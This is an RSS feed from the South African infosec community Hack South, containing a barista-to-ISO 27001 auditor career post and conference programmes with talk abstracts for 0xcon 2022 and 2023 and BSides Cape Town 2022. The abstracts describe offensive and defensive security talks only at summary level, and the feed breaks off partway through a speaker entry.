<p>Hack South feed (<a href="https://hacksouth.africa/feed.xml">https://hacksouth.africa/feed.xml</a>), generated by Jekyll, last updated 2023-11-07T20:20:17+00:00. South Africa's largest cybersecurity community. Hackers, makers, breakers, infosec professionals and students welcome. Join our Discord for cyber events, CTFs and professional development.</p>
<h2 id="from-barista-to-iso27001">From Barista to ISO27001</h2>
<p>Published 2023-10-12 at <a href="https://hacksouth.africa/career/from-barista-to-iso27001">https://hacksouth.africa/career/from-barista-to-iso27001</a>.</p>
<p><img src="/assets/images/from-barista-to-iso27001/header.jpg" alt="Preview" /></p>
<p>Life’s journey often takes unexpected turns, and sometimes, those twists can lead to remarkable transformations in your career. Over the past year and a bit, I have gone on a career journey that started from behind a coffee counter and ended with the privilege of leading a team of ISO 27001 internal auditors.</p>
<p>Not so long ago, my days were filled with the rich aroma of coffee beans and the friendly hum of customers. I was a barista, crafting cappuccinos and lattes, creating moments of warmth and connection for patrons. While I loved the hustle and bustle of the cafe, I was nearing the end of my studies and wanted to switch things up a bit.</p>
<p>I was browsing LinkedIn and saw Bevan Lane asking for junior information security consultants, so I decided to throw my hat in the ring and drop him an email. While I was optimistic, due to my lack of certifications or tangible cybersecurity knowledge I didn’t think I was going to be successful in this attempt, but thought it would be good interviewing experience. One interview led into another, and roughly a month after that first email I was meeting with the team on Day 1 as an information security consultant.</p>
<p>Being thrown into the deep end, but having the likes of Bevan and Rowan Botha to lean on, meant learning fast and adapting on the fly. I joined in the midst of a big company push towards implementing ISO27001 within companies and conducting their internal audits, with a gap forming for someone to head up the auditing team. I buried my head into ISO27001 and ensured I was well versed, taking every opportunity to get involved in audits and implementation meetings.</p>
<p>After a few months of learning about ISO, I was sent on the PECB ISO 27001 Lead Implementer course which allowed me to bank a certification and was a nice reward for all the work I had been doing. This also boosted my confidence to advise clients on implementations and hold my own during audits.
My time at Infosec Advisory Group so far has flown by and I now find myself heading up an audits and assessments team, something barista me could never see happening.</p>
<p>Within the audits and implementations, being able to talk to people at all levels in a company has been vital. You spend hours and hours in meetings, so you need to be good at holding a conversation; otherwise you can quickly fall into the question-answer monotony.
To pinpoint one specific moment where I started feeling comfortable talking to people way above me in title would be hard; I rather credit it to multiple smaller interactions with people occupying these C-suite positions in various companies. From conferences to events hosted by vendors and joining the CISO Alliances for a day, these allowed me to converse with people about cybersecurity, but in a relaxed, non-work environment. No matter their title, they still put their pants on one leg at a time.</p>
<p>Consider this post a bit of personal reflection on my progress, something I think people often don’t do in this fast-paced industry. I am guilty of always looking for the next best thing; sometimes it is good to look back and see just how far you have come.
Remember, your career journey can take unexpected and exciting turns, and with the right dedication, anything can be done. Whether you’re eyeing a career change or are simply curious about a new field, don’t hesitate to take that first step – your transformative journey may be just around the corner.</p>
<p>Jared Rochat</p>
<h2 id="0xcon-2023">0xcon 2023</h2>
<p>Published 2023-10-07 at <a href="https://hacksouth.africa/conferences/0xcon-2023">https://hacksouth.africa/conferences/0xcon-2023</a>.</p>
<p>0xcon is aimed at bringing together the local cyber security community to share knowledge and to network with like-minded individuals. This event is very much by the community for the community, so whether you’re a seasoned expert or just starting out, we would love to welcome you to our conference as we enhance our understanding of the cyber security landscape. The conference covers a wide array of topics including cyber security best practices, threat intelligence, IoT security, ransomware, incident response, cloud security, data privacy, application security, penetration testing, coordinated inauthentic behavior and disinformation.</p>
<p>0xcon returns for another year of sharing information in the community. More information about the conference is set out below.</p>
<h3 id="how-to-participate">How to participate</h3>
<ul>
<li>0xcon 2023 will take place on Saturday 4 November 2023 from 09:00 to 17:00 at the <a href="https://goo.gl/maps/E7D7qAFNMSTsDWR29">MTN Innovation Center (214 14th Avenue, Fairland, Johannesburg)</a>.</li>
<li>Tickets are R200 and can be purchased from <a href="https://www.quicket.co.za/events/186022-0xcon-2023#/">Quicket</a>.</li>
</ul>
<h3 id="event-program">Event Program</h3>
<p><img src="/assets/images/0xcon/2023-program-v2.jpg" alt="Program" class="align-center" /></p>
<h2 id="keynote---leon-jacobs">Keynote - Leon Jacobs</h2>
<p>Some thoughts on the benefits of research.</p>
<p><em>About Leon</em></p>
<p>Guy who likes to eat with two forks. Hacker @sensepost</p>
<h2 id="2023-year-in-review-threads-of-nation-state-dystopia---jared-naude">2023 Year in Review: Threads of nation-state dystopia - Jared Naude</h2>
<p>Retrospectives are a great tool to look back at past events to understand what went right and what went wrong. In doing so, we can identify lessons that can be learned and what needs to be improved. This talk will be focused on analyzing the major cyber security events of the past year along with insight, analysis, and commentary on what it means for the wider cybersecurity community. 2023 saw a massive shift in the strategy and playbooks of state sponsored actors in targeting, tactics, and methods.</p>
<p>In this talk, we will discuss the impact and significance of the shift in nation-state activity while looking at events of the past year, even if they are not nation-state related. Some of the topics and events that will be covered in this talk include the following: how Ukraine has countered Russia’s cyber and disinformation, how Russia is struggling with Chinese technology, the US’s overreaction to TikTok, Chinese state-sponsored activity into US critical infrastructure and US department emails, the rise of commercial spyware and its implications, why the Cyber-Safety Review Board (CSRB) is doomed to fail, the impact of adversarial AI and LLMs, cross-tenant cloud vulnerabilities, troubling privacy legislation, and the impact of lost key material.</p>
<p><em>About Jared</em></p>
<p><a href="https://www.twitter.com/JaredNaude">Jared</a> is the Head of Security at Synthesis, where he specializes in enterprise cloud architecture. Jared is passionate and deeply committed to guiding large organizations through the complexities of architecting, securing and operationalizing enterprise cloud environments. Beyond Jared’s professional responsibilities, Jared is an enthusiastic advocate for community building, serving as the organizer of several local security events, including 0xcon, BSides Cape Town, and BSides Joburg. Jared’s research focuses on cybersecurity topics that intersect with national security and foreign policy issues such as encryption, privacy, surveillance, disinformation, and nation-state activity.</p>
<h2 id="ed2root---how-ancient-ipc-mechanisms-can-help-you-today---connor-du-plooy">ed2root - how ancient IPC mechanisms can help you today - Connor du Plooy</h2>
<p>This talk will go over how I found a vulnerability in a text editor on macOS. Other variants of this vulnerability have been identified in other packages as well, and even though the APIs used by these packages have been deprecated for a really long time, they are still around in some software.</p>
<p>The vulnerable component is exposed over IPC, so the talk will be broken down into the following sections:</p>
<ul>
<li>An introduction to the vulnerable component (+- 5 minutes)</li>
<li>A brief demonstration of the vulnerability (+- 2 minutes) (how to get root from a text editor)</li>
<li>A primer to show how the software can be identified by combining static/dynamic analysis techniques (+- 2 minutes)</li>
<li>Q&amp;A</li>
</ul>
<p>Key Takeaways:</p>
<ul>
<li>Why using deprecated APIs is always a bad idea</li>
<li>How to identify vulnerable software</li>
<li>Understand the abstractions you build on</li>
</ul>
<p><em>About Connor</em></p>
<p>I work as a mobile security consultant for MWR CyberSec. I love security but specifically have a passion for mobile applications and reverse engineering.</p>
<h2 id="let-the-children-play---leveraging-ad-cs-for-persistence-and-profit-in-parent-child-configured-forests---tinus-green">Let the Children play - Leveraging AD CS for persistence and profit in Parent-Child configured forests - Tinus Green</h2>
<p>In 2021, Active Directory Certificate Services (AD CS) came under scrutiny because of the opportunities it provides attackers for credential theft, domain and forest privilege escalation, and persistence. Since then, it has become a household name for red and blue teams alike. Unintended consequences and additional attack avenues are continually being discovered. This talk will cover new discoveries in this space from two perspectives:</p>
<ul>
<li>Lateral Movement - Noisy compromises of the Parent domain through Golden or Diamond tickets to get to other Child domains are a thing of the past</li>
<li>Cross-Domain Escalation - A newly discovered default permission misconfiguration allowing forest-wide persistence from any Child domain</li>
</ul>
<p>This talk will not only demonstrate these newly discovered attacks and the tooling released to exploit them, but also provide insights into mitigation methods that can be applied to close these attack avenues and the detection methods that can be used to discover them.</p>
<p><em>About Tinus</em></p>
<p>Tinus is currently the Head of Consultancy, where he leads the entire consultancy division, including all service areas and the research division. Previously he was the Service Lead for the Network Security and Application Security divisions and second-in-command for these services globally. In these services, he helped innovate in the respective service space to ensure that MWR provides top-tier, research-driven services to their clients.</p>
<p>In the Cyber-defence field, he assists executives and senior management teams of several strategic clients in an advisory capacity in helping solve business and operational security challenges. This includes creating long-term roadmaps for cyber resilience and using the tools available to the organisation to better track and understand their security posture.</p>
<p>He was responsible for creating a Technical Tabletop Exercise solution. This service simulates real-life attacks in a mock environment to provide training opportunities for Computer Security Incident Response Teams (CSIRTs) to enable companies to improve their Incident Response and Management processes.</p>
<p>Since Tinus has a passion for training, he is also involved as a content engineer for TryHackMe to create cyber security training content and a part-time final-year project leader at the University of Pretoria for their EEC Engineering division.</p>
<h2 id="noooooooooo-touch---michael-rodger">Noooooooooo touch! - Michael Rodger</h2>
<p>A few years ago, a new addition to the standard lineup of access control equipment quietly appeared - the humble “No touch” sensor. These mostly replaced physical buttons, the typical use case being letting yourself out from the “inside”, where the “outside” would have some form of control such as a keypad, RFID scanner, biometrics, etc. Naturally if you were already inside, you wouldn’t have to authenticate yourself to leave.
Fast forward to 2020 and “things you didn’t have to touch” were all the rage, so these started popping up all over the place (according to my observations). I was curious as to how they worked, and whether the range could somehow be manipulated. I had a hunch that they functioned by reflecting infrared light of some sort, and I confirmed this by buying one and taking it apart. I came up with an idea to brute-force these to open with an external light source, and then a high-powered infrared LED behind a lens to extend the range significantly. This was attractive because they are frequently placed on the “inside” of glass doors where the “outside” requires authentication, so having a high-powered “no touch blaster” would let you into places you shouldn’t be :)
My initial research revealed that they seem to be more secure than I’d hoped, so I’m now less confident that beating them is even possible, but I have a few more ideas around what could be tried.
At a minimum, this will be a talk about taking a piece of hardware and dissecting it to figure out how it works, and essentially security testing it. General hardware security methodology and my journey from wondering, to opening, to what I learned about the devices. Best case scenario, I find a method that works and talk about the weaknesses and end up with a gadget in my red-team bag of tricks.</p>
<p>Also, the title is “noooooooo touch” with 10x o because of the extended range, so I’m <em>really</em> not touching it.</p>
<p><em>About Michael</em></p>
<p>Starting out as an electronic engineer, I quickly learned that my penchant for disassembling things and figuring out how they functioned also meant that I liked breaking things.
I joined the dots to infosec and since around 2013 I’ve been involved in the ZA hacker community. I’ve been helping with conference and meetup organising and badge building for most of the time since then, and in 2023 I made things official by joining the research team at Orange Cyberdefense.
I still tinker with hardware every chance I get, either fixing or improving something I have, or building something new. I’ve already come to terms with the consequences I’ll one day face when I teach my 2 small kids to question and dismantle everything, although my wife has already put a moratorium on bringing home broken electronics because “I’m sure I can fix this”.
I don’t like long walks on the beach because the sand gets everywhere and it smells like fish. I do like mountain biking though. Sorry, did you say “brief?”</p>
<h2 id="this-wide-world-of-consent---jonathon-everatt">This Wide World of Consent - Jonathon Everatt</h2>
<p>The advent of cloud-based technologies and identity management solutions, as well as the widespread adoption of these technologies by businesses and users, has introduced new attack vectors that malicious actors can try to abuse. One of these is a new type of phishing, called consent phishing.</p>
<p>In Consent Phishing, an attacker-controlled application requests dangerous or sensitive permissions over a user’s account or organisation’s tenant. The goal of Consent Phishing is to gain the necessary authorisation (consent) over an aspect or portion of a user’s account. The consent grants are managed through an Identity Provider using the OAuth 2.0 framework; examples of these technologies would include Azure, Facebook, and Discord.</p>
<p>This talk will explore the concept of consent phishing and utilise examples of consent phishing in Azure to illustrate the explanation. The talk will focus on both the offensive perspective and the defensive perspective of the attack and its relevant indicators of compromise. The talk will also show a high-level investigation of how other technologies tackle the problem of consent phishing.</p>
<p><em>About Jonathon</em></p>
<p>Hi, my name is Jonathon Everatt, I am a CyberSecurity Consultant at MWR CyberSec and the lead of the Web Application Security Service. I graduated from UCT in 2021 with a First Class Computer Science Honours degree. I learnt CyberSecurity through the TryHackMe platform and others where I go by the alias “Fluffiest Bunny”.</p>
<h2 id="hacking-for-humanity---matthew-hughes">Hacking for Humanity - Matthew Hughes</h2>
<p>Have you ever tried your hand at GeoGuessr, the online game that challenges you to guess your location from random street views? In my talk, I’ll unveil the surprising connections between the problem-solving skills used in this game and the world of hacking and cybersecurity.</p>
<p>My journey started with GeoGuessr, where I noticed how similar the way we think during the game is to the thought processes of hackers and cybersecurity experts. It was like learning to hack the real world without realising it!</p>
<p>During the talk, we’ll delve into the fascinating world of seemingly ordinary photos and videos on the internet. I’ll emphasise why it’s crucial for all of us to be cautious about what we share online. You’ll also hear real-life examples of how geolocation, the art of figuring out locations based on clues, has been used to find terrorist compounds and provide crucial evidence in missing persons cases.</p>
<p>But it’s not all about risks. I’ll also demonstrate how we can harness geolocation skills for positive purposes. Through this research I was able to develop an AI tool using machine learning that can analyse and identify street bollards, a key factor in geolocation.</p>
<p>Join me for this talk, where we’ll explore the intriguing connections between a simple online game and the dynamic world of geolocation in cybersecurity.</p>
<p><em>About Matthew</em></p>
<p>My name is <a href="https://twitter.com/dovendyrr">Matthew Hughes</a> - I’ve been a Security Analyst at Orange Cyberdefense’s Sensepost team for over a year now. Based in Cape Town, I’m a high school dropout that has always been fascinated with how technology works, but more importantly how it could be tampered with.</p>
<h2 id="the-cyber-pirates-guide-to-c2-development---gerhard-botha">The cyber-pirate’s guide to C2 development - Gerhard Botha</h2>
<p>Covering the basics of, and considerations in, creating a Command &amp; Control framework. Going over the basics of a C2 and discussing the whys and wheres of their usage. Then diving into the different elements to take into account when making design choices. We’ll also be covering how to start your own journey. Finally, what you need to look out for when the project is ready to go on to the next step.</p>
<p><em>About Gerhard</em></p>
<p><a href="https://www.twitter.com/gerbot_">A human</a> with a passion for malware development, offensive security research and tooling. Likes hacking and gaming, also likes game hacking, does not like scope-creep. During the day, this human pentests and annoys co-workers with memes. His boss probably thinks he doesn’t do much work.</p>
<h2 id="git-your-secrets---isak-van-der-walt">GIT your secrets? - Isak van der Walt</h2>
<p>This will be the same talk as I presented at 0xcoffee, with some minor updates if time permits.
The talk covers three primary aspects:</p>
<ul>
<li>A technical overview of how the git version control tool works.</li>
<li>Some inherent and typical security issues related to git.</li>
<li>Prevention and resolution of the previously demonstrated issues.</li>
</ul>
<p>This talk does not contain any “new” research but rather just a full presentation of the git internals, the known inherent vulnerabilities and their resolution - all of which have been previously documented.</p>
<p>The first section aims to provide an overview for people not familiar with git, before diving into the building block - so called “plumbing” - tools utilized by git to perform its version control. This serves to provide a better understanding for the vulnerabilities as well as how to better utilize git.</p>
<p>The second section covers inherent vulnerabilities such as lack of author validation and secrets in version control histories, some of which will be accompanied by a basic demonstration. This also provides a baseline for what to look for from a defender’s perspective.</p>
<p>Finally, the preventative measures and resolutions will be covered to address the aforementioned issues. Some simple measures, in addition to knowledge of the vulnerabilities, can vastly reduce most of the surface area and risk associated with the covered vulnerabilities.</p>
<p><em>About Isak</em></p>
<p><a href="https://www.twitter.com/IPmegladon">Isak</a> is a junior security analyst, fresh out of university this year. He previously did some web and embedded development, and later part-time sysadmin work, before and during his studies. He also serves as a staff member at Hack South and as an organiser for BSides Cape Town.</p>
<h2 id="the-great-china-firewall---tayla-sellschop">The Great China Firewall - Tayla Sellschop</h2>
<p>The talk details living in China.
It covers grappling with censorship and the distinction between state-sponsored and independent VPNs.
It goes over how the firewalls in China work and the various hardware limitations that consumers face.</p>
<ul>
<li>My life in China, and how internet access varies depending on when government committees and conferences take place</li>
<li>Information, and the lack thereof, during the beginning of the COVID outbreak</li>
<li>Navigating WeChat censorship and the hardware challenges of iOS and Android</li>
<li>Why sometimes you need to go to Hong Kong or Taiwan if you want the right app store</li>
<li>China vs the rest of the world’s app stores</li>
</ul>
<p><em>About Tayla</em></p>
<p>Hi!! I’m <a href="https://www.twitter.com/taylasellschop">Tayla</a>!! I’m a junior cyber security analyst at Telspace. I have a passion for cyber forensics and cryptography. I got into the industry because I wanted to make everyday people safer. I have a background in law and I lived in China for several years.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We look forward to seeing everyone at our event!</p>
<p>0xcon</p>
Hacking for Humanity - Matthew Hughes Have you ever tried your hand at GeoGuessr, the online game that challenges you to guess your location from random street views? In my talk, I’ll unveil the surprising connections between the problem-solving skills used in this game and the world of hacking and cybersecurity. My journey started with GeoGuessr, where I noticed how similar the way we think during the game is to the thought processes of hackers and cybersecurity experts. It was like learning to hack the real world without realising it! During the talk, we’ll delve into the fascinating world of seemingly ordinary photos and videos on the internet. I’ll emphasise why it’s crucial for all of us to be cautious about what we share online. You’ll also hear real-life examples of how geolocation, the art of figuring out locations based on clues, has been used to find terrorist compounds and provide crucial evidence in missing persons cases. But it’s not all about risks. I’ll also demonstrate how we can harness geolocation skills for positive purposes. Through this research I was able to develop an AI tool using machine learning that can analyse and identify street bollards, a key factor in geolocation. Join me for this talk, where we’ll explore the intriguing connections between a simple online game and the dynamic world of geolocation in cybersecurity. About Matthew My name is Matthew Hughes - I’ve been a Security Analyst at Orange Cyberdefense’s Sensepost team for over a year now. Based in Cape Town, I’m a high school dropout that has always been fascinated with how technology works, but more importantly how it could be tampered with. The cyber-pirate’s guide to C2 development - Gerhard Botha Covering the basics and considerations into creating a Command & Control framework. Going over the basics of a C2 and discussing the why’s and where’s of their usage. Then diving into the different elements to take into account when making design choices. 
We’ll also be covering how to start your own journey. Finally, what you need to look out for when the project is ready to go onto the next step. About Gerhard A human with a passion for malware development, offensive security research and tooling. Likes hacking and gaming, also likes game hacking, does not like scope-creep. During the day, this human pentests and annoys co-workers with memes. His boss probably thinks he doesn’t do much work. GIT your secrets? - Isak van der Walt This will be the same talk as I presented at 0xcoffee, with some minor updates if time permits. The talk covers three primary aspects: A technical overview of how the git version control tool works. Some inherent and typical security issues related to git. Prevention and resolution of the prior demonstrated issue. This talk does not contain any “new” research but rather just a full presentation of the git internals, the known inherent vulnerabilities and their resolution - all of which have been previously documented. The first section aims to provide an overview for people not familiar with git, before diving into the building block - so called “plumbing” - tools utilized by git to perform its version control. This serves to provide a better understanding for the vulnerabilities as well as how to better utilize git. The second section covers inherent vulnerabilities such as lack of author validation and secrets in version control histories, some of which will be accompanied with a basic demonstration. This also provides a baseline for what to look for from a defender’s perspective Finally the preventative measures and resolutions will be covered to address the aforementioned issues. Some simple measures in addition to the knowledge of the vulnerabilities can vastly reduce most of the surface area and risk associated with the covered vulnerabilities. About Isak Isak is a Junior security analyst, fresh out of university this year. 
Previously did some web and embedded development and later sysadmin work part time before and during my studies. Also serving as a staff member at Hack South and as an organiser for BSides Cape Town. The Great China Firewall - Tayla Sellschop The talk details living in China. It covers grappling with censorship and the distinction between state-sponsored and independent VPNs. It goes over how the firewalls in China work and the various hardware limitations that consumers face. My life in China, how internet access varies depending on when government committees and conferences that take place. How information and lack thereof during the beginning of the COVID outbreak Navigating wechat censorship and the hardware challenges of IOS and Android Why sometimes you need to go to Hongkong or Taiwan if you want the right app store China vs the rest of the world app stores About Tayla Hi!! I’m Tayla !! I’m a junior cyber security analyst at Telspace. I have a passion for cyber forensics and crytography. I got into the industry because I wanted to make everyday people safer. I have a backgroung in law and I lived in China for several years. Conclusion We look forward to seeing everyone at our event!BSIDES 2022 free tickets in giving back2022-11-03T00:00:00+00:002022-11-03T00:00:00+00:00https://hacksouth.africa/conferences/bsides-2022-giving-back-tickets<h3 id="giving-back">Giving Back</h3>
<p>As part of our vision and mission to connect the infosec community in Cape Town and get new people involved, we would like to give back to the community.</p>
<p>We already have the rite of passage initiative to find and assist up and coming students interested in information security, but to add to our initiatives we would like to give away a number of tickets to people who cannot afford the conference.</p>
<p>We don’t want finances to be a blocker to meeting interested and curious future hackers. No matter who we are, all of us started somewhere and someone had to take a chance with us.</p>
<h3 id="apply">Apply</h3>
<p>If you wish to attend Bsides Cape Town 2022 and would like to tell us your story, please apply via the link below.
<a href="https://forms.gle/iAht8Ct4Dd93KvLWA">Apply Link</a></p>
<h3 id="conclusion">Conclusion</h3>
<p>Claim your 1 of 10 tickets if your application is successful!</p>
Christo (Goose/crypticG00se) Goosen
Bsides 2022 programme
2022-11-03T00:00:00+00:00
https://hacksouth.africa/conferences/bsides-2022-programme
<p>Bsides Cape Town 2022 is a month away. We are excited to finally have Cape Town’s hacker summer camp and year end in person again. We have some really exciting speakers and a workshop.</p>
<h3 id="how-to-participate">How to participate</h3>
<ul>
<li>Get your tickets: https://qkt.io/M9YKVw</li>
<li>Keep an eye on our YouTube channel:</li>
<li>Buy a hoodie: https://qkt.io/M9YKVw (Merchandise to be fetched on the day)</li>
</ul>
<h3 id="location">Location</h3>
<p>Map: <a href="https://www.google.com/maps/dir/Cape+Town+International+Airport+(CPT),+Matroosfontein,+Cape+Town/The+Old+Biscuit+Mill+375+Albert+Rd+Woodstock,+Cape+Town+7915/@-33.9459699,18.4768862,13z/data=!3m1!4b1!4m13!4m12!1m5!1m1!1s0x1dcc4542f7400bbd:0x40487579e3cf5e90!2m2!1d18.6020851!2d-33.971463!1m5!1m1!1s0x1dcc5da6b46abd99:0x39cc47e5b0eb6340!2m2!1d18.4571621!2d-33.9274629">Google Maps</a>
Venue: https://tobmce.co.za/
More about venue: https://bsidescapetown.co.za/bsides-conf/2022-location</p>
<h3 id="event-program">Event Program</h3>
<table>
<thead>
<tr>
<th>Time</th>
<th>Track 1</th>
<th>Track 2</th>
</tr>
</thead>
<tbody>
<tr>
<td>08h00-09h00</td>
<td>Registration</td>
<td> </td>
</tr>
<tr>
<td>09h00</td>
<td>Opening remarks</td>
<td> </td>
</tr>
<tr>
<td>09h10</td>
<td>Entersekt Open</td>
<td> </td>
</tr>
<tr>
<td>09h15</td>
<td>(Keynote) Made in SA - For the world - Haroon Meer</td>
<td> </td>
</tr>
<tr>
<td>10h15</td>
<td>ALL BARK, NO BYTE - Amy Mania</td>
<td>An IOT War Story - Jason Spencer</td>
</tr>
<tr>
<td>11h00</td>
<td>Break</td>
<td>Break</td>
</tr>
<tr>
<td>11h15</td>
<td>Smart Watch Lobotomy - Dale Nunns</td>
<td>Securing a cloud native open source microservice based core banking system - Ntando Mngomezulu</td>
</tr>
<tr>
<td>12h00</td>
<td>Lunch</td>
<td>Lunch</td>
</tr>
<tr>
<td>13h00</td>
<td>XXX astroturfing campaign - Roelof Temmingh</td>
<td>Abusing AWS permissions – Teaching an old dog new tricks - Jason Kessel</td>
</tr>
<tr>
<td>13h50</td>
<td>Home Alone isn’t scary, it’s inspiration - Dev Dua, Tyron Kemp, Denver Abrey</td>
<td>– Pending –</td>
</tr>
<tr>
<td>14h35</td>
<td>Break</td>
<td>Break</td>
</tr>
<tr>
<td>14h50</td>
<td>The Russia-Ukraine War: A retrospective - Jared Naude</td>
<td>Permanently bricking smart contracts for fun and profit - Ashiq Amien</td>
</tr>
<tr>
<td>15h35</td>
<td>Break</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td>15h50</td>
<td>(Final Keynote) DECEPTION VIA PERCEPTION: Jayson E Street</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td>16h35</td>
<td>Prize Giving</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td>17h00</td>
<td>Closing Ceremony</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td> </td>
<td>AFTER PARTY</td>
<td> </td>
</tr>
</tbody>
</table>
<h3 id="workshop">Workshop:</h3>
<p>Iosiro will host a workshop. We will announce signup soon. For a sneak peek: <a href="https://iosiro.notion.site/Workshop-Introduction-to-Smart-Contract-Security-7b412d4fd420437fab1f053268cb1512">Workshop</a></p>
<h3 id="conclusion">Conclusion</h3>
<p>We can’t wait to see everyone in person!</p>
Christo (Goose/crypticG00se) Goosen
0xcon 2022
2022-10-17T00:00:00+00:00
https://hacksouth.africa/conferences/0xcon-2022
<p>0xcon 2022 returns to an in-person event after 2 years of online virtual events due to Covid.
For those unaware, 0xcon started in 2017 and is a South African conference that is aimed at building the Gauteng and ZA infosec community. The conference welcomes both new and experienced alike and works hard to keep things open and free to everyone.</p>
<h3 id="how-to-participate">How to participate</h3>
<ul>
<li>0xcon 2022 will take place on Saturday 12 November 2022 from 09:00 to 17:00 at the <a href="https://goo.gl/maps/E7D7qAFNMSTsDWR29">MTN Innovation Center (214 14th Avenue, Fairland, Johannesburg)</a>.</li>
<li>Tickets are free but you must <a href="https://www.quicket.co.za/events/186023-0xcon-2022#/">get tickets for parking and entrance to the venue.</a></li>
<li>Please note that you will need a Covid-19 vaccination certificate to gain entrance to the venue. If you have been vaccinated, you can get your certificate from the <a href="https://vaccine.certificate.health.gov.za/">Department of Health’s Vaccine Portal</a>.</li>
<li>RSVP to our <a href="https://www.linkedin.com/events/6987401479154225152/about/">LinkedIn event</a> and please share this with your friends and colleagues!</li>
</ul>
<h3 id="event-program">Event Program</h3>
<p><img src="/assets/images/0xcon/2022programv3.jpg" alt="Program" class="align-center" /></p>
<h2 id="pulling-passwords-out-of-configuration-manager-practical-attacks-against-microsofts-endpoint-management-software---christopher-panayi">Pulling Passwords out of Configuration Manager: Practical Attacks against Microsoft’s Endpoint Management Software - Christopher Panayi</h2>
<p>System Center Configuration Manager, now Microsoft Endpoint Configuration Manager (MECM), is a software management product that has been widely adopted by large organizations to deploy, update, and manage software; it is commonly responsible for the deployment and management of the majority of server and workstation machines in enterprise Windows environments.</p>
<p>This talk will provide an outline of how MECM is used to deploy machines into enterprise environments (typically through network booting, although it supports various Operating System deployment techniques), and will explore attacks that allow Active Directory credentials to be extracted from this process. The common MECM misconfigurations leading to these attacks will be detailed and, in so doing, the talk will aim to show how to identify and exploit these misconfigurations and how to defend against these attacks. Each viable attack will be discussed in depth (mostly by discussing the protocols and architecture in use, but sometimes by diving into relevant code, if necessary) so that the context of how and why the attack works will be understood. These concepts will be illustrated through the demo of PXEThief (https://github.com/MWR-CyberSec/PXEThief), a tool that allows for the extraction of credentials from several of the onsite deployment techniques that MECM supports.</p>
<p><em>About Christopher</em></p>
<p><a href="https://twitter.com/Raiona_ZA">Christopher</a> is the Chief Research Officer at <a href="https://mwrcybersec.com/">MWR CyberSec</a>, having previously led cyber-defense, red team, and targeted attack simulation (TAS) engagements for several years, as well as having designed and helped run the in-house training programme for security consultants at MWR. As part of this work, a major focus area for him has been understanding attack techniques impacting Active Directory (AD); this led to publications such as a discussion of the previous gold standard in AD security, the red forest, and why it did not meet its goal of making environments more secure in many cases (<a href="https://www.f-secure.com/content/dam/press/ja/media-library/reports/F-Secure%20Whitepaper%20-%20Tending%20To%20the%20Red%20Forest%20(English).pdf">F-Secure Whitepaper - Tending To the Red Forest (English).pdf</a>). His interest in how things work at a deep technical level - and desire to develop an understanding of how to use this information to compromise and secure systems and environments - has led him to his current focus, investigating and understanding Microsoft Endpoint Configuration Manager, how it interacts with AD, and how to abuse its configuration to attack enterprise environments.</p>
<h2 id="2022-year-in-review---jared-naude">2022 Year in Review - Jared Naude</h2>
<p>Looking back at events that have taken place for lessons that can be learned is an important ingredient to enable forward insight, especially in the cyber security space. In this talk, I will go through the various security news, events and incidents of note that occurred in 2022 while adding some commentary and analysis from myself. This will primarily focus on the Russia-Ukraine invasion and the various failures that we have seen but will also cover trends in ransomware and malware, disinformation and breaches.</p>
<p><em>About Jared</em></p>
<p><a href="https://twitter.com/JaredNaude">Jared</a> is a Cloud Architect that specializes in enterprise cloud architecture and security; he is passionate about helping large organizations with architecting, building, securing and operationalizing cloud environments. Jared’s research interests and policy advocacy work involves cyber security topics that intersect with national security and foreign policy issues such as encryption, privacy, surveillance and disinformation.</p>
<h2 id="ransomware-and-incident-response-within-south-africa---ivan-burke">Ransomware and Incident response within South Africa - Ivan Burke</h2>
<p>This will cover key information items such as first responder actions which aid in better recovery of business processes, common pitfalls and misconceptions about service provider accountability and ability to assist during an active incident response. I will also be covering some resources users can use to test and practice internal incident response processes and scenario building. If there is interest in it, I can extend the talk length to include some case studies of IRs that took place during the year which we were involved in.</p>
<p><em>About Ivan</em></p>
<p><a href="https://twitter.com/ahyaimie">Ivan</a> has been a cyber security researcher working for the Council for Scientific and Industrial Research (CSIR) for 14 years. During this time he has worked for the Cyber Defence Research group and assisted on various governmental projects related to cyber defence. In October 2021, Ivan started to work at a private cyber security consulting and research company, called BlueVision ITM (https://bitm.co.za/). Ivan is currently employed as the Head of Research, Innovation and Development at BlueVision, where his role is mostly to develop innovative strategies to prevent, detect and eradicate cyber threats within client environments. Over the past year BITM has coordinated numerous national IR processes for SMEs and larger state owned entities. BITM is fully CREST accredited for Incident Response, vulnerability management and penetration testing.</p>
<h2 id="investigating-the-coordinated-inauthentic-behavior-of-a-south-african-business-during-the-covid-lockdown---roelof-temmingh">Investigating the Coordinated Inauthentic Behavior of a South African Business during the Covid lockdown - Roelof Temmingh</h2>
<p>In the same way that hackers target computers, corporations target people’s minds and wallets. When exploits become marketing campaigns and semantic hackers become world leaders you know it’s time to shift your registers in a major way. CIB is the new buzzword and if you think it’s only the domain of St Petersburg troll farms you’ve missed the plot. Join this talk and see how this shit is happening from Sunnyside to Woodstock, from Melrose House to your treehouse.</p>
<p><em>About Roelof</em></p>
<p><a href="https://twitter.com/RoelofTemmingh">Roelof</a> is the founder of SensePost, Maltego, and Vortimo. Stone cold badass and all around cool guy.</p>
<h2 id="hac---hacking-as-code-devsecops---christo-goosen">HaC - Hacking as Code (DevSecOps) - Christo Goosen</h2>
<p>A talk on SecureCodeBox + DefectDojo and doing vulnerability scanning as part of the DevSecOps pipeline. Automate OWASP ZAP, WhatWeb, SSLyze, Nmap scans, etc. with Kubernetes configs. A deployed Kubernetes setup with a custom resource type, Scan, for running jobs on your internal and external infra. Combine that with DefectDojo and Helm/ArgoCD and you have a powerful hacking as code setup.</p>
<p><em>About Christo</em></p>
<p><a href="https://twitter.com/crypticg00se">Christo</a> is a DevSecOps lead and is always stuck in between development, infrastructure and security. Loves to build, deploy and break systems. Crypto miner, Python dev, DevOps, etc. Photography &amp; surfing to try and be offline. BSides Cape Town leader.</p>
<h2 id="pentesting-cloud-how-an-introduction-into-azure-pentesting---javan-mnjama">Pentesting Cloud… How? An introduction into Azure Pentesting - Javan Mnjama</h2>
<p>With the growth of cloud computing and the adoption of cloud, security professionals are slowly being pushed away from the traditional approach of pentesting and are adapting by finding new techniques for cloud penetration testing. This talk will focus on a brief introduction to performing a penetration assessment against an Azure environment using the cyber attack kill chain from a cloud perspective. An overview will also be presented on the techniques and tooling available for offensive security professionals when reviewing Azure environments.</p>
<p><em>About Javan</em></p>
